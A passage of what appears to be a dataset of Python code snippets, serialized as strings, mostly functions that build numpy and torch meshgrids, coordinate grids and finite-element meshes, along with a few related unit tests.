np.meshgrid(par.grid_b_pd,par.grid_a_pd,indexing='ij')\n \n # d. working: egm (seperate grids for each segment)\n \n if par.solmethod == 'G2EGM':\n\n # i. dcon\n par.d_dcon = np.zeros((par.Na_pd,par.Nb_pd),dtype=np.float_,order='C')\n \n # ii. acon\n par.Nc_acon = np.int_(np.floor(par.Na_pd*par.acon_fac))\n par.Nb_acon = np.int_(np.floor(par.Nb_pd*par.acon_fac))\n par.grid_b_acon = nonlinspace(0,par.b_max,par.Nb_acon,par.phi_n)\n par.a_acon = np.zeros(par.grid_b_acon.shape)\n par.b_acon = par.grid_b_acon\n\n # iii. con\n par.Nc_con = np.int_(np.floor(par.Na_pd*par.con_fac))\n par.Nb_con = np.int_(np.floor(par.Nb_pd*par.con_fac))\n \n par.grid_c_con = nonlinspace(par.eps,par.m_max,par.Nc_con,par.phi_m)\n par.grid_b_con = nonlinspace(0,par.b_max,par.Nb_con,par.phi_n)\n\n par.b_con,par.c_con = np.meshgrid(par.grid_b_con,par.grid_c_con,indexing='ij')\n par.a_con = np.zeros(par.c_con.shape)\n par.d_con = np.zeros(par.c_con.shape)\n \n elif par.solmethod == 'NEGM':\n\n par.grid_l = par.grid_m\n\n # e. shocks\n assert (par.Neta == 1 and par.var_eta == 0) or (par.Neta > 1 and par.var_eta > 0)\n\n if par.Neta > 1:\n par.eta,par.w_eta = log_normal_gauss_hermite(np.sqrt(par.var_eta), par.Neta)\n else:\n par.eta = np.ones(1)\n par.w_eta = np.ones(1)\n\n # f. timings\n par.time_work = np.zeros(par.T)\n par.time_w = np.zeros(par.T)\n par.time_egm = np.zeros(par.T)\n par.time_vfi = np.zeros(par.T)", "def xy_mesh(nx, ny, x_min=0, x_max=1, y_min=0, y_max=1):\n\n\tx = np.linspace(x_min, x_max, nx)\n\ty = np.linspace(y_min, y_max, ny)\n\txv, yv = np.meshgrid(x, y)\n\t\n\treturn xv, yv", "def mesh(self):\n return numpy.meshgrid(*self.edges, indexing='ij')", "def make_grid(x1_points, **kwargs):\n x2_points = kwargs.pop('x2_points', x1_points)\n x1min = kwargs.pop('x1min', 0.0)\n x1max = kwargs.pop('x1max', 1.0)\n x2min = kwargs.pop('x2min', 0.0)\n x2max = kwargs.pop('x2max', 1.0)\n if kwargs:\n raise TypeError('Unexpected **kwargs: {0}'.format(kwargs))\n x1_setup = np.linspace(x1min, x1max, num=x1_points)\n # flip x2 order to have y increacing on plots' verticle axis\n x2_setup = np.linspace(x2min, x2max, num=x2_points)[::-1]\n x1_grid, x2_grid = np.meshgrid(x1_setup, x2_setup)\n return x1_grid, x2_grid", "def meshgrid(self):\n vecs = self.coord_vecs\n return np.meshgrid(*vecs, indexing='ij')", "def _create_input_grid(self, x1, x2):\n return x1.unsqueeze(-2), x2.unsqueeze(-3)", "def test_quadrature_grid(self):\n L = 2\n M = 2\n N = 0\n NFP = 1\n\n grid_quad = QuadratureGrid(L, M, N, NFP)\n\n roots, weights = special.js_roots(3, 2, 2)\n\n quadrature_nodes = np.stack(\n [\n np.array([roots[0]] * 5 + [roots[1]] * 5 + [roots[2]] * 5),\n np.array(\n [0, 2 * np.pi / 5, 4 * np.pi / 5, 6 * np.pi / 5, 8 * np.pi / 5] * 3\n ),\n np.zeros(15),\n ]\n ).T\n\n np.testing.assert_allclose(grid_quad.spacing.prod(axis=1), grid_quad.weights)\n np.testing.assert_allclose(grid_quad.nodes, quadrature_nodes)", "def makemesh_regular(data,vecs,grid):\n\tdata = beyonder(data,vecs,growsize=0.1)\n\txypts = np.array([[i,j] for i in np.linspace(0,vecs[0],grid[0].astype(int)) \n\t\tfor j in np.linspace(0,vecs[1],grid[1].astype(int))])\n\tinterp = scipy.interpolate.LinearNDInterpolator(data[:,0:2],data[:,2],fill_value=0.0)\n\tbilinear_pts = np.array([[i[0],i[1],interp(i[0],i[1])] for i in xypts])\n\tresult = scipy.interpolate.griddata(bilinear_pts[:,0:2],bilinear_pts[:,2],bilinear_pts[:,0:2],\n\t\tmethod='cubic')\n\t#---observed that griddata returns points where we cycle through the points in the following\n\t#---...order:x0,y0),(x0,y1),...(x0,yn),(x1,y0),... and so on, suggesting that the following \n\t#---...reshape command (which reshape function claims to use the \"C\" programming language convention\n\t#---...for reshaping objects by default, which convention has the last index changing \"fastest\")\n\txyz_pts = np.array([[bilinear_pts[i,0],bilinear_pts[i,1],result[i]] for i in range(len(result))])\n\treturn np.reshape(xyz_pts[:,2],grid.astype(int))", "def square_mesh(N):\n xs,ys = np.meshgrid(np.linspace(0,1,N),np.linspace(0,1,N))\n xs = xs.flatten(1)\n ys = ys.flatten(1)\n _,_,t,_ = triang.delaunay(xs,ys)\n p = np.vstack((xs,ys)).T\n\n return Trimesh(p,t)", "def make_cartesian(self, grid, axis='z'):\n if grid.shape != self.shape:\n raise NotImplementedError('make_cartesian: grid shape mismatch'\n ' not supported')\n gt_flat = grid.t.flat\n r_flat = self.r.flat\n t_flat = self.t.flat\n\n if axis == 'z':\n self.x = self.r.copy()\n self.y = self.r.copy()\n x_flat = self.x.flat\n y_flat = self.y.flat\n for i in range(self.r.size):\n gt = gt_flat[i]\n sine = sin(gt)\n cosine = cos(gt)\n r = r_flat[i]\n t = t_flat[i]\n x_flat[i] = r*cosine - t*sine\n y_flat[i] = r*sine + t*cosine\n self.r = None\n self.t = None\n\n elif axis == 'x':\n self.x = self.z\n self.y = self.r.copy()\n self.z = self.r.copy()\n y_flat = self.y.flat\n z_flat = self.z.flat\n for i in range(self.r.size):\n gt = gt_flat[i]\n sine = sin(gt)\n cosine = cos(gt)\n r = r_flat[i]\n t = t_flat[i]\n y_flat[i] = r*cosine - t*sine\n z_flat[i] = r*sine + t*cosine\n self.r = None\n self.t = None\n\n else:\n raise ValueError(\"axis must be 'z' or 'x'\")", "def meshgrid(i, j, indexing='ij'):\n if K.ndim(i) != 1 or K.ndim(j) != 1:\n raise ValueError('need ndim() == 1')\n if K.backend() == 'tensorflow':\n import tensorflow as tf\n I, J = tf.meshgrid(i, j, indexing=indexing)\n else:\n assert K.backend() == 'theano'\n from theano import tensor as T\n I = T.repeat(i, K.shape(j)[0])\n J = T.tile(j, K.shape(i)[0])\n shape = (K.shape(i)[0], K.shape(j)[0])\n return K.reshape(I, shape), K.reshape(J, shape)", "def meshup(self, ind='ij'):\r\n xv, yv, zv = self.vec()\r\n x_reg, y_reg, z_reg = np.meshgrid(xv, yv, zv, indexing=ind)\r\n\r\n return x_reg, y_reg, z_reg", "def to_mesh(\n self,\n lims_x: array_like = (-1, 1),\n lims_y: array_like = (-1, 1),\n ) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n a, b, c, d = self.cartesian()\n x_center, y_center = self.point[:2]\n\n values_x = x_center + lims_x\n values_y = y_center + lims_y\n\n X, Y = np.meshgrid(values_x, values_y)\n\n if c != 0:\n Z = -(a * X + b * Y + d) / c\n\n elif b != 0:\n Z = -(a * X + c * Y + d) / b\n X, Y, Z = X, Z, Y\n\n else:\n Z = -(b * X + c * Y + d) / a\n X, Y, Z = Z, X, Y\n\n return X, Y, Z", "def get_2d_cartesian_grid(num_pts_1d, ranges):\n # from math_tools_cpp import cartesian_product_double as cartesian_product\n from PyDakota.math_tools import cartesian_product\n x1 = np.linspace(ranges[0], ranges[1], num_pts_1d)\n x2 = np.linspace(ranges[2], ranges[3], num_pts_1d)\n abscissa_1d = []\n abscissa_1d.append(x1)\n abscissa_1d.append(x2)\n grid = cartesian_product(abscissa_1d, 1)\n return grid", "def grid(x, y):\n return product(xrange(1, x+1), xrange(1, y+1))", "def build_planar_mesh(cellWidth, x, y, geom_points, geom_edges,\n out_filename='base_mesh.nc', logger=None):\n\n with LoggingContext(__name__, logger=logger) as logger:\n\n da = xarray.DataArray(cellWidth,\n dims=['y', 'x'],\n coords={'y': y, 'x': x},\n name='cellWidth')\n cw_filename = 'cellWidthVsXY.nc'\n da.to_netcdf(cw_filename)\n\n logger.info('Step 1. Generate mesh with JIGSAW')\n jigsaw_driver(cellWidth, x, y, on_sphere=False,\n geom_points=geom_points, geom_edges=geom_edges,\n logger=logger)\n\n logger.info('Step 2. Convert triangles from jigsaw format to netcdf')\n jigsaw_to_netcdf(msh_filename='mesh-MESH.msh',\n output_name='mesh_triangles.nc', on_sphere=False)\n\n logger.info('Step 3. Convert from triangles to MPAS mesh')\n args = ['MpasMeshConverter.x',\n 'mesh_triangles.nc',\n out_filename]\n check_call(args=args, logger=logger)", "def makegridnd(meshsize, dimension):\n x = np.meshgrid(*[np.linspace(MIN_POINT_PRECISION, 1,meshsize) for d in range(dimension)])\n mesh = np.asarray(x)\n total = np.sum(mesh,axis=0)\n plane_mesh = mesh[:,np.isclose(total,1.0,atol=1e-2)]\n\n return plane_mesh", "def meshup2d(self, ind='ij'):\r\n\r\n xv, yv, _ = self.vec()\r\n x_reg, y_reg = np.meshgrid(xv, yv, indexing=ind)\r\n\r\n return x_reg, y_reg", "def create_local_grid(points: np.ndarray, edge_sides: dict, triangles: np.ndarray,\n fault_is_plane: bool, resolution: float=5000.0, num_search_tris: int=10):\n\n # Edge coordinates.\n left_edge = edge_sides['left_edge']\n right_edge = edge_sides['right_edge']\n bottom_edge = edge_sides['bottom_edge']\n top_edge = edge_sides['top_edge']\n\n # Determine number of points in each direction.\n left_diffs = np.diff(left_edge, axis=0)\n left_length = np.sum(np.linalg.norm(left_diffs, axis=1))\n num_divs_left = left_length/resolution\n\n right_diffs = np.diff(right_edge, axis=0)\n right_length = np.sum(np.linalg.norm(right_diffs, axis=1))\n num_divs_right = right_length/resolution\n\n num_vert_points = int(round(0.5*(num_divs_left + num_divs_right))) + 1\n\n bottom_diffs = np.diff(bottom_edge, axis=0)\n bottom_length = np.sum(np.linalg.norm(bottom_diffs, axis=1))\n num_divs_bottom = bottom_length/resolution\n\n top_diffs = np.diff(top_edge, axis=0)\n top_length = np.sum(np.linalg.norm(top_diffs, axis=1))\n num_divs_top = top_length/resolution\n\n num_horiz_points = int(round(0.5*(num_divs_bottom + num_divs_top))) + 1\n num_points = num_vert_points*num_horiz_points\n\n # Get interpolated points on edges.\n ygrid_left = np.linspace(left_edge[0,1], left_edge[-1,1], num=num_vert_points, dtype=np.float64)\n xgrid_left = np.interp(ygrid_left, left_edge[:,1], left_edge[:,0])\n zgrid_left = np.interp(ygrid_left, left_edge[:,1], left_edge[:,2])\n ygrid_right = np.linspace(right_edge[0,1], right_edge[-1,1], num=num_vert_points, dtype=np.float64)\n xgrid_right = np.interp(ygrid_right, right_edge[:,1], right_edge[:,0])\n zgrid_right = np.interp(ygrid_right, right_edge[:,1], right_edge[:,2])\n xgrid_bottom = np.linspace(bottom_edge[0,0], bottom_edge[-1,0], num=num_horiz_points, dtype=np.float64)\n ygrid_bottom = np.interp(xgrid_bottom, bottom_edge[:,0], bottom_edge[:,1])\n zgrid_bottom = np.interp(xgrid_bottom, bottom_edge[:,0], bottom_edge[:,2])\n xgrid_top = np.linspace(top_edge[0,0], top_edge[-1,0], num=num_horiz_points, dtype=np.float64)\n ygrid_top = np.interp(xgrid_top, top_edge[:,0], top_edge[:,1])\n zgrid_top = np.interp(xgrid_top, top_edge[:,0], top_edge[:,2])\n\n # Create 2D mesh.\n mesh_points = np.zeros((num_vert_points, num_horiz_points, 3), dtype=np.float64)\n\n # We need to do this for points on the boundary, which might fall outside a mesh triangle.\n if not(fault_is_plane):\n z = np.zeros((num_vert_points, num_horiz_points), dtype=np.float64)\n is_mesh_edge = np.zeros((num_vert_points, num_horiz_points), dtype=np.bool)\n is_mesh_edge[0,:] = True\n is_mesh_edge[-1,:] = True\n is_mesh_edge[:,0] = True\n is_mesh_edge[:,-1] = True\n z[:,0] = zgrid_left\n z[:,-1] = zgrid_right\n z[0,:] = zgrid_bottom\n z[-1,:] = zgrid_top\n \n for row_num in range(num_vert_points):\n mesh_points[row_num,:,0] = np.linspace(xgrid_left[row_num], xgrid_right[row_num],\n num=num_horiz_points, dtype=np.float64)\n for col_num in range(num_horiz_points):\n mesh_points[:,col_num,1] = np.linspace(ygrid_bottom[col_num], ygrid_top[col_num],\n num=num_vert_points, dtype=np.float64)\n\n # If surface is not a plane, interpolate to get z-coordinates.\n mesh_points = mesh_points.reshape(num_points, 3)\n if not(fault_is_plane):\n is_mesh_edge = is_mesh_edge.reshape(num_points)\n z = z.reshape(num_points)\n mesh_points[:,2] = tri_interpolate_zcoords(points, triangles, mesh_points[:,0:2],\n is_mesh_edge, num_search_tris=num_search_tris)\n mesh_points[is_mesh_edge,2] = z[is_mesh_edge]\n\n return (mesh_points, num_horiz_points, num_vert_points)", "def flat_2D_grid(bounds, dx, dy):\n x = np.arange(bounds[0], bounds[1] + dx, dx)\n y = np.arange(bounds[2], bounds[3] + dy, dy)\n x_grid, y_grid = np.meshgrid(x, y)\n x_grid, y_grid = x_grid.flatten(), y_grid.flatten()\n\n return pd.DataFrame({'x': x_grid,\n 'y': y_grid,\n 'masked': np.zeros(x_grid.size, dtype='bool')})", "def QuadrilateralProjection(c1=(0,0), c2=(2,0), c3=(2,2), c4=(0,2), points=None, npoints=10, equally_spaced=True):\n\n if points is None or not isinstance(points,np.ndarray):\n if not isinstance(c1,tuple) or not isinstance(c2,tuple) or not isinstance(c3,tuple) or not isinstance(c4,tuple):\n raise ValueError(\"coordinates should be given in tuples of two elements (x,y)\")\n else:\n c1 = np.array(c1); c2 = np.array(c2); c3 = np.array(c3); c4 = np.array(c4)\n opoints = np.vstack((c1,c2,c3,c4))\n else:\n opoints = points\n\n from Florence.FunctionSpace import Quad, QuadES\n from Florence.QuadratureRules.GaussLobattoPoints import GaussLobattoPointsQuad\n from Florence.QuadratureRules.EquallySpacedPoints import EquallySpacedPoints\n\n npoints = int(npoints)\n if npoints ==0: npoints=1\n\n if equally_spaced:\n points = EquallySpacedPoints(ndim=3,C=npoints-1)\n hpBases = QuadES.Lagrange\n else:\n points = GaussLobattoPointsQuad(npoints-1)\n hpBases = Quad.LagrangeGaussLobatto\n\n BasesQuad = np.zeros((4,points.shape[0]),dtype=np.float64)\n for i in range(points.shape[0]):\n BasesQuad[:,i] = hpBases(0,points[i,0],points[i,1],arrange=1)[:,0]\n\n node_arranger = NodeArrangementQuad(npoints-1)[2]\n\n qmesh = Mesh()\n qmesh.Square(lower_left_point=(-1.,-1.), side_length=2,n=npoints, element_type=\"quad\")\n quads = qmesh.elements\n\n\n nnode = qmesh.nnode\n nelem = qmesh.nelem\n nsize = int((npoints+1)**2)\n\n mesh = Mesh()\n mesh.points = np.dot(BasesQuad.T, opoints)\n\n _, inv = np.unique(quads,return_inverse=True)\n sorter = np.argsort(node_arranger)\n mesh.elements = sorter[inv].reshape(quads.shape)\n\n mesh.element_type=\"quad\"\n mesh.nelem = mesh.elements.shape[0]\n mesh.nnode = mesh.points.shape[0]\n mesh.GetBoundaryEdges()\n\n return mesh", "def get_meshgrid(self, dim: int = 2) -> list:\n if dim != 2:\n raise NotImplementedError\n vectors = [self.get_ticks(ax) for ax in range(dim)]\n vectors.reverse()\n return np.meshgrid(*vectors)", "def cmesh(self):\n return numpy.meshgrid(*self.centers, indexing='ij')", "def create_grid(xlim, ylim, step):\n x_range = np.arange(xlim[0], xlim[1], step)\n y_range = np.arange(ylim[0], ylim[1], step)\n return x_range, y_range", "def get_gridded_parameters(q, xparam=\"x\", yparam=\"y\", zparam=\"z\"):\n plotParamDF = q[ [xparam, yparam, zparam] ]\n plotParamDF[xparam] = plotParamDF[xparam].tolist()\n plotParamDF[yparam] = np.round(plotParamDF[yparam].tolist(), 1)\n plotParamDF = plotParamDF.groupby( [xparam, yparam] ).mean().reset_index()\n plotParamDF = plotParamDF[ [xparam, yparam, zparam] ].pivot( xparam, yparam )\n x = plotParamDF.index.values\n y = plotParamDF.columns.levels[1].values\n X, Y = np.meshgrid( x, y )\n # Mask the nan values! pcolormesh can't handle them well!\n Z = np.ma.masked_where(\n np.isnan(plotParamDF[zparam].values),\n plotParamDF[zparam].values)\n return X,Y,Z", "def regrid(xi, yi, zi, xo, yo):\n xi = common.lon180(xi)\n xo = common.lon180(xo)\n\n idx = dict((k, i) for i, k in enumerate(xi))\n selx = [idx[i] for i in xo]\n idy = dict((k, i) for i, k in enumerate(yi))\n sely = [idy[i] for i in yo]\n selX, selY = numpy.meshgrid(selx, sely)\n return zi[selY, selX]", "def makeGrid(self):\n self.h = self.step_x\n self.k = self.step_t\n self.t, self.x = np.meshgrid(np.arange(self.min_t, self.max_t, self.step_t), np.arange(self.min_x, self.max_x\n , self.step_x))", "def define_grid(self):\n self.h_shape = int(\n np.round((self.h_stop - self.h_start) / self.h_step, 2)) + 1\n self.k_shape = int(\n np.round((self.k_stop - self.k_start) / self.k_step, 2)) + 1\n self.l_shape = int(\n np.round((self.l_stop - self.l_start) / self.l_step, 2)) + 1\n self.grid_origin = [self.h_start, self.k_start, self.l_start]\n self.grid_step = [int(np.rint(1.0/self.h_step)),\n int(np.rint(1.0/self.k_step)),\n int(np.rint(1.0/self.l_step))]\n self.grid_shape = [self.h_shape, self.k_shape, self.l_shape]\n self.grid_basis = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]", "def test_get_meshgrid(mock_grid):\n\n windows = [corr_window.CorrWindow(j, 0, WS=127) for j in range(0, 129, 64)]\n mock_grid._array[0] = windows\n windows = [corr_window.CorrWindow(0, i, WS=127) for i in range(0, 193, 64)]\n for ii in range(1, 4):\n mock_grid._array[ii][0] = windows[ii]\n\n expx, expy = np.meshgrid([0, 64, 128], [0, 64, 128, 192])\n actx, acty = mock_grid.get_meshgrid()\n\n assert np.all(actx == expx)\n assert np.all(acty == expy)", "def make_grid(N):\n\n x = np.linspace(-2. , 2 , N)\n y = np.linspace(-2. , 2 , N)\n # two evenly spaced grids from -2 to 2\n\n return x, y", "def convert_meshgrid(g, op, block):\n\n inputs = op.input(\"X\")\n x = [g.get_node(i) for i in inputs]\n outs = _op.meshgrid(x, indexing=\"ij\")\n for i, out in enumerate(outs):\n g.add_node(op.output(\"Out\")[i], out)", "def test_Grid_creates_array_space():\n\n # create dummy meshgrid\n img_dim, spacing = (193, 193), 64\n x_vec = np.arange(0, img_dim[1], spacing)\n y_vec = np.arange(0, img_dim[0], spacing)\n xx, yy = np.meshgrid(x_vec, y_vec)\n\n # create Grid\n g = mg.Grid(img_dim, spacing)\n\n assert g.ny == len(y_vec)\n assert g.nx == len(x_vec)", "def meshgridflat(*args, copy=False):\n outputs = np.meshgrid(*args, indexing='ij', copy=copy) # type: Iterable[np.ndarray]\n outputs = [v.flatten() for v in outputs]\n return outputs", "def define_grid():\n grid_left = np.array([[-13.1000000000000, -35.5000000000000, -48.3000000000000, -60, -16.9000000000000,\n -34.8000000000000, -67.5000000000000, -46.1000000000000, -59.8000000000000,\n -14.2000000000000, -28.3000000000000, -42.3000000000000, -67.6000000000000,\n -50.5000000000000, -14.6000000000000, -60.9000000000000, -31.6000000000000,\n -5.10000000000000, -65.6000000000000, -41.8000000000000, -55.1000000000000,\n -22.7000000000000, -5.80000000000000, -49.2000000000000, -34.5000000000000,\n -61.5500000000000, -63.6000000000000, -40.4000000000000, -48.7000000000000,\n -21.8000000000000, -58.2000000000000, -7, -36.3000000000000, -48.1000000000000,\n -56.8000000000000, -7.30000000000000, -22.2000000000000, -36.8000000000000,\n -46.8000000000000],\n [-67.7000000000000, -60, -55.1000000000000, -51.8000000000000, -51.6000000000000,\n -49.3000000000000, -47.1000000000000, -43.7000000000000, -39.6000000000000,\n -39.1000000000000, -31.2000000000000, -30.7000000000000, -30.1000000000000,\n -24.4000000000000, -22.7000000000000, -18.7000000000000, -16.9000000000000,\n -12.6000000000000, -10.8000000000000, -10.2000000000000, -4.01000000000000, 1.20000000000000,\n 2.80000000000000, 3.70000000000000, 3.90000000000000, 6.20000000000000, 8.30000000000000,\n 11.8000000000000, 14.5000000000000, 16, 18.2000000000000, 18.4000000000000, 19.9000000000000,\n 24.6000000000000, 28.5200000000000, 33.8000000000000, 35, 35.4000000000000,\n 35.6000000000000],\n [69.1000000000000, 66, 58.2000000000000, 48, 78, 71.7000000000000, 31, 61.1000000000000,\n 53.3000000000000, 81.1000000000000, 76, 70.2000000000000, 41.2000000000000, 64.4000000000000,\n 80.2000000000000, 50.9000000000000, 75.2000000000000, 77.3000000000000, 37.8000000000000, 67,\n 53.2000000000000, 72, 74.8000000000000, 54.7000000000000, 66.5000000000000, 35.9000000000000,\n 25.7000000000000, 60.7000000000000, 50.5000000000000, 68.9000000000000, 27.3000000000000,\n 70.3000000000000, 59.6000000000000, 44, 20.8000000000000, 61.7000000000000, 57.2000000000000,\n 47, 36]])\n stn_left = np.array([[-14.6, -13.2, -11.7, -9.10, -11.7, -13.2, -7.90, -10],\n [-15.1, -15.1, -15.1, -12.6, -12.6, -12.6, -9.40, -10.1],\n [-5.40, -7.20, -8.70, -8.70, -7.50, -5.10, -10.3, -7.80]])\n grid_right = np.copy(grid_left)\n grid_right[0, :] = grid_right[0, :] * -1\n stn_right = np.copy(stn_left)\n stn_right[0, :] = stn_right[0, :] * -1\n\n return grid_left, grid_right, stn_left, stn_right", "def compute_mesh(nrow, ncol, nele):\n tri_index = np.zeros((nele, 3))\n for i in range(nrow-1):\n for j in range(NUM):\n if j == 0:\n tri_index[i*4*NUM+j*4, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4, 1] = (i+1)\n tri_index[i*4*NUM+j*4, 2] = (i+2)\n\n tri_index[i*4*NUM+j*4+1, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4+1, 1] = (i+2)\n tri_index[i*4*NUM+j*4+1, 2] = (i+2)+(2*j+1)*nrow\n else:\n tri_index[i*4*NUM+j*4, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4, 1] = (i+1)+(2*j-1)*nrow\n tri_index[i*4*NUM+j*4, 2] = (i+2)+(2*j-1)*nrow\n\n tri_index[i*4*NUM+j*4+1, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4+1, 1] = (i+2)+(2*j-1)*nrow\n tri_index[i*4*NUM+j*4+1, 2] = (i+2)+(2*j+1)*nrow\n \n tri_index[i*4*NUM+j*4+2, 0] = (i+1)+2*j*nrow\n tri_index[i*4*NUM+j*4+2, 1] = (i+1)+2*(j+1)*nrow\n tri_index[i*4*NUM+j*4+2, 2] = (i+2)+2*(j+1)*nrow\n\n tri_index[i*4*NUM+j*4+3, 0] = (i+1)+2*j*nrow\n tri_index[i*4*NUM+j*4+3, 1] = (i+2)+2*(j+1)*nrow\n tri_index[i*4*NUM+j*4+3, 2] = (i+2)+2*j*nrow\n return tri_index", "def DoubleCoupleGridRegular(magnitudes=[1.], npts_per_axis=40):\n v = 0.\n w = 0.\n\n kappa = regular(0., 360, npts_per_axis)\n sigma = regular(-90., 90., npts_per_axis)\n h = regular(0., 1., npts_per_axis)\n rho = list(map(to_rho, asarray(magnitudes)))\n\n return Grid(\n dims=('rho', 'v', 'w', 'kappa', 'sigma', 'h'),\n coords=(rho, v, w, kappa, sigma, h),\n callback=to_mt)", "def CreateTargetGeoField(nbtimestep,latlen,lonlen):\n\n pres_grid = np.zeros((nbtimestep, latlen, lonlen))\n u_grid = np.zeros((nbtimestep, latlen, lonlen))\n v_grid = np.zeros((nbtimestep, latlen, lonlen))\n\n return pres_grid,u_grid,v_grid", "def getQuadrilaterals(self):\n ugroup = np.unique(self._group_index)\n ngroup = len(ugroup)\n qlist = []\n for i in range(ngroup):\n ind = np.where(self._group_index == ugroup[i])[0]\n nq = len(ind) - 1\n for j in range(nq):\n P0 = Point(self._toplons[j],\n self._toplats[j],\n self._topdeps[j])\n P1 = Point(self._toplons[j + 1],\n self._toplats[j + 1],\n self._topdeps[j + 1])\n P2 = Point(self._botlons[j + 1],\n self._botlats[j + 1],\n self._botdeps[j + 1])\n P3 = Point(self._botlons[j],\n self._botlats[j],\n self._botdeps[j])\n qlist.append([P0, P1, P2, P3])\n\n return qlist", "def get_par_meshgrid(self, copy=False, sparse=False): \n axes = []\n for i in range(self.get_n_dimensions()):\n axes.append(self.dims[i].values_strs)\n return np.meshgrid(*axes, copy, sparse, indexing='ij')", "def plot_2D_edp(self, xmin=-100, xmax=100, zmin=-100, zmax=100, N=201):\n rho_xz = []\n xgrid = np.linspace(xmin, xmax, num=N)\n zgrid = np.linspace(zmin, zmax, num=N)\n for x in xgrid:\n for z in zgrid:\n tmp = self.phase * self.F * np.cos(self.qx*x+self.qz*z)\n rho_xz.append([x, z, tmp.sum(axis=0)])\n rho_xz = np.array(rho_xz, float) \n X, Y, Z= rho_xz[:,0], rho_xz[:,1], rho_xz[:,2]\n #Y = rho_xz[:,1]\n #Z = rho_xz[:,2]\n X.shape = (N, N)\n Y.shape = (N, N)\n Z.shape = (N, N)\n plt.figure()\n plt.contourf(X, Y, Z)", "def mesh_generation(coordinates):\n # Get the minimum and maximum for the latitudes\n min_latitude = np.min(coordinates[:, 0])\n max_latitude = np.max(coordinates[:, 0])\n # Get the minimum and maximum for the longitudes\n min_longitude = np.min(coordinates[:, 1])\n max_longitude = np.max(coordinates[:, 1])\n # Get the number of provided coordinates\n size = int(np.min([1e5, np.max([5e4, len(coordinates)])]))\n # Create an array of uniform-random points as a mesh\n mesh_1 = np.random.uniform(min_latitude, max_latitude, size)\n mesh_2 = np.random.uniform(min_longitude, max_longitude, size)\n mesh = np.vstack((mesh_1.flatten(), mesh_2.flatten())).T\n # Return the evenly-spaced mesh for the coordinates\n return mesh", "def make_grid(data=None, xmin=-5, xmax=5, ymin=-5, ymax=5, n_points = 400):\n if data is not None:\n xmin, ymin = np.min(data, axis = 0)\n xmax, ymax = np.max(data, axis = 0)\n\n plt.ylim(ymin, ymax)\n plt.xlim(xmin, xmax)\n\n x, y = np.meshgrid(np.linspace(xmin, xmax, n_points), np.linspace(ymin, ymax, n_points))\n grid = np.c_[x.ravel(), y.ravel()] # grid has n_points ^2 row and 2 columns\n return x, y, grid", "def construct_simplex_meshgrid(ng, dimSimplex):\n t_list = np.linspace(0, 1, ng)\n tmp = np.array(np.meshgrid(*[t_list for i in range(dimSimplex - 1)]))\n m = np.zeros([tmp[0].ravel().shape[0], dimSimplex])\n for i in range(dimSimplex - 1):\n m[:, i] = tmp[i].ravel()\n m[:, dimSimplex - 1] = 1 - np.sum(m, axis=1)\n return (m[m[:, -1] >= 0, :])", "def grid(x, y, z, resX=100, resY=100):\n x = x.flatten()\n y = y.flatten()\n z = z.flatten()\n xi = linspace(min(x), max(x), resX)\n yi = linspace(min(y), max(y), resY)\n zi = griddata(x, y, z, xi, yi, interp='linear')\n return xi, yi, zi", "def getQuadrilaterals(self):\n pass", "def __init__(self, dx = 1., dy = 1., nx = 1, ny = 1,\n _RepresentationClass=_Grid2DRepresentation, _TopologyClass=_Mesh2DTopology):\n\n self.args = {\n 'dx': dx,\n 'dy': dy,\n 'nx': nx,\n 'ny': ny\n }\n\n self.nx = nx\n self.ny = ny\n\n self.numberOfHorizontalFaces = self.nx * (self.ny + 1)\n self.numberOfVerticalFaces = self.ny * (self.nx + 1)\n self.numberOfEachDiagonalFaces = self.nx * self.ny\n\n self.dx = PhysicalField(value = dx)\n scale = PhysicalField(value = 1, unit = self.dx.unit)\n self.dx /= scale\n\n self.dy = PhysicalField(value = dy)\n if self.dy.unit.isDimensionless():\n self.dy = dy\n else:\n self.dy /= scale\n\n self.numberOfCornerVertices = (self.nx + 1) * (self. ny + 1)\n self.numberOfCenterVertices = self.nx * self.ny\n self.numberOfTotalVertices = self.numberOfCornerVertices + self.numberOfCenterVertices\n\n self.offset = (0, 0)\n\n vertices = self._createVertices()\n faces = self._createFaces()\n\n cells = self._createCells()\n cells = numerix.sort(cells, axis=0)\n\n Mesh2D.__init__(self, vertices, faces, cells,\n _RepresentationClass=_RepresentationClass, _TopologyClass=_TopologyClass)\n\n self.scale = scale", "def two_plane_obj_points(grid_size, dx):\r\n objp_xy = np.zeros((grid_size[0]*grid_size[1], 3), np.float32)\r\n objp_yz = np.zeros((grid_size[1]*grid_size[2], 3), np.float32)\r\n objp_xy[:,:2] = np.mgrid[0:grid_size[0], 0:grid_size[1]].T.reshape(-1, 2)\r\n objp_yz[:,1:3] = np.mgrid[0:grid_size[1], 0:grid_size[2]].T.reshape(-1, 2)\r\n\r\n return objp_xy*dx, objp_yz*dx", "def _construct_r_grid(n, dr=None, r=None):\n if dr is None and r is None:\n # default value, we don't care about the scaling since the mesh size was not provided\n dr = 1.0\n\n if dr is not None and r is not None:\n raise ValueError('Both r and dr input parameters cannot be specified at the same time')\n elif dr is None and r is not None:\n if r.ndim != 1 or r.shape[0] != n:\n raise ValueError('The input parameter r should be a 1D array'\n 'of shape = ({},), got shape = {}'.format(n, r.shape))\n # not so sure about this, needs verification\n dr = np.gradient(r) \n\n else:\n if isinstance(dr, np.ndarray):\n raise NotImplementedError\n r = (np.arange(n) + 0.5)*dr\n return r, dr", "def make_coordinate_grid(spatial_size, type):\n h, w = spatial_size\n x = torch.arange(w).type(type)\n y = torch.arange(h).type(type)\n x = 2 * (x / (w - 1)) - 1\n y = 2 * (y / (h - 1)) - 1\n yy = y.view(-1, 1).repeat(1, w)\n xx = x.view(1, -1).repeat(h, 1)\n meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2)\n return meshed", "def interp_2D(data_grid, info=ProcessInfo()):\n print('Interpolating data...')\n meth = info.INTERP_METHOD # Get method for interpolating\n print(meth)\n\n xy_grid = np.nonzero(data_grid)\n z_grid = data_grid[xy_grid]\n grid_x, grid_y = np.mgrid[0:1000:1000j, 0:1000:1000j]\n interp_grid = interpolate.griddata(xy_grid, z_grid, (grid_x, grid_y), method=meth)\n\n return interp_grid", "def uniform_mesh(n, 